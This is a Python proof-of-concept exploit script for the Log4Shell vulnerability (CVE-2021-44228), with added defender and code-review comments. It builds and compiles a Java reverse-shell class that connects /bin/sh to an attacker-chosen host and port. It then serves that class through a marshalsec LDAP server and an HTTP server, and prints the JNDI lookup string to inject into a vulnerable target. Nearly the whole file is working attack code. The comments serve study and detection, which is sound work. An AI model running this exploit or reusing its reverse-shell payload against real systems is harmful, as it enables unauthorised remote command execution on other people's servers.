kozmer
GitHub Repository: kozmer/log4j-shell-poc
Path: blob/main/poc.py
#!/usr/bin/env python3
import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
# Absolute path of the directory that contains this script. The bundled JDK
# and the marshalsec jar are located relative to it.
CUR_FOLDER = Path(__file__).parent.resolve()
def generate_payload(userip: str, lport: int) -> None:
    """Render the Java template to ``Exploit.java`` and compile it.

    Args:
        userip: Host string substituted into the template's ``host`` literal.
        lport: Port number substituted into the template's ``port`` literal.

    Raises:
        OSError: Re-raised, after a message is printed, when writing the file
            or launching javac fails.
    """
    # The template's constructor starts /bin/sh, connects a socket to
    # host:port and copies bytes between the two until the socket closes or
    # the process exits.
    # Defender note: on a host that loaded this class the observable effect is
    # a Java process spawning /bin/sh alongside a new outbound TCP connection,
    # which is a practical detection signal.
    # NOTE(review): userip is substituted into a Java string literal without
    # escaping, so a quote or backslash in it alters the generated source.
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)

    # Write the rendered source to Exploit.java; the path is relative, so the
    # file lands in the current working directory.

    p = Path("Exploit.java")

    try:
        p.write_text(program)
        # NOTE(review): the javac exit status is not checked, so a failed
        # compilation still reaches the success message below.
        subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
    except OSError as e:
        print(Fore.RED + f'[-] Something went wrong {e}')
        raise e
    else:
        print(Fore.GREEN + '[+] Exploit java class created success')
def payload(userip: str, webport: int, lport: int) -> None:
    """Build the payload class, then run the LDAP and HTTP servers.

    The LDAP server runs in a background thread; the HTTP server runs in the
    calling thread and blocks inside ``serve_forever()``.

    Args:
        userip: Address passed to the payload template and the LDAP server.
        webport: Port the HTTP server listens on; also given to
            ``ldap_server``.
        lport: Port written into the generated payload.
    """
    generate_payload(userip, lport)
    print(Fore.GREEN + '[+] Setting up LDAP server\n')

    # The LDAP helper blocks on a subprocess, so it gets its own thread.
    ldap_thread = threading.Thread(target=ldap_server, args=(userip, webport))
    ldap_thread.start()

    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    # NOTE(review): SimpleHTTPRequestHandler serves the process's current
    # working directory and the socket is bound to every interface, so all
    # files in that directory are readable by any host that can reach the port.
    bind_address = ('0.0.0.0', webport)
    HTTPServer(bind_address, SimpleHTTPRequestHandler).serve_forever()
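def check_java() -> bool:
    """Report whether the JDK bundled next to this script can be executed.

    Runs ``jdk1.8.0_20/bin/java -version`` under ``CUR_FOLDER`` with its
    output discarded.

    Returns:
        True when the command exits with status 0; False when it exits with
        another status or cannot be started at all.
    """
    java_bin = os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java')
    try:
        completed = subprocess.run(
            [java_bin, '-version'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
    except OSError:
        # A missing or non-executable binary raises instead of returning a
        # status; the caller expects False so it can print its own message.
        return False
    return completed.returncode == 0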
def ldap_server(userip: str, lport: int) -> None:
    """Print the JNDI lookup string and run marshalsec's LDAPRefServer.

    Blocks until the Java subprocess exits.

    Args:
        userip: Address placed in the lookup string and in the URL handed to
            the LDAP server.
        lport: Port used in that URL. Despite the name, ``payload()`` passes
            the HTTP server's port here.
    """
    # Defender note: the printed value is the JNDI lookup form tied to
    # CVE-2021-44228. Its appearance in logged request fields, together with
    # outbound LDAP traffic to port 1389 from a Java service, is a common
    # indicator. JDK 8u191 and later default
    # com.sun.jndi.ldap.object.trustURLCodebase to false, which blocks this
    # remote-class path but not the lookup itself; upgrading Log4j is the fix.
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")

    java_bin = os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java")
    marshalsec_jar = os.path.join(
        CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"
    )
    # URL the LDAP server is given; the fragment names the compiled class.
    codebase_url = "http://{}:{}/#Exploit".format(userip, lport)

    command = [
        java_bin,
        "-cp",
        marshalsec_jar,
        "marshalsec.jndi.LDAPRefServer",
        codebase_url,
    ]
    subprocess.run(command)
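def main() -> None:
    """Parse command-line options, check the bundled JDK and start the PoC.

    Options:
        --userip: Address used for the LDAP server and the payload
            (default ``localhost``).
        --webport: Port for the HTTP server (default 8000).
        --lport: Port written into the payload (default 9001).

    Raises:
        SystemExit: With status 1 when ``check_java()`` returns False, and
            with status 0 when the run is interrupted from the keyboard.
    """
    init(autoreset=True)
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")

    parser = argparse.ArgumentParser(description='log4shell PoC')
    parser.add_argument(
        '--userip',
        metavar='userip',
        type=str,
        default='localhost',
        help='Enter IP for LDAPRefServer & Shell',
    )
    # Port defaults are integers so they agree with the declared type=int
    # instead of relying on argparse to convert string defaults.
    parser.add_argument(
        '--webport',
        metavar='webport',
        type=int,
        default=8000,
        help='listener port for HTTP port',
    )
    parser.add_argument(
        '--lport',
        metavar='lport',
        type=int,
        default=9001,
        help='Netcat Port',
    )

    args = parser.parse_args()

    try:
        if not check_java():
            print(Fore.RED + '[-] Java is not installed inside the repository')
            raise SystemExit(1)
        payload(args.userip, args.webport, args.lport)
    except KeyboardInterrupt:
        # payload() blocks in the HTTP server, so Ctrl-C is the normal exit.
        print(Fore.RED + "user interrupted the program.")
        raise SystemExit(0)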
# Run the PoC only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()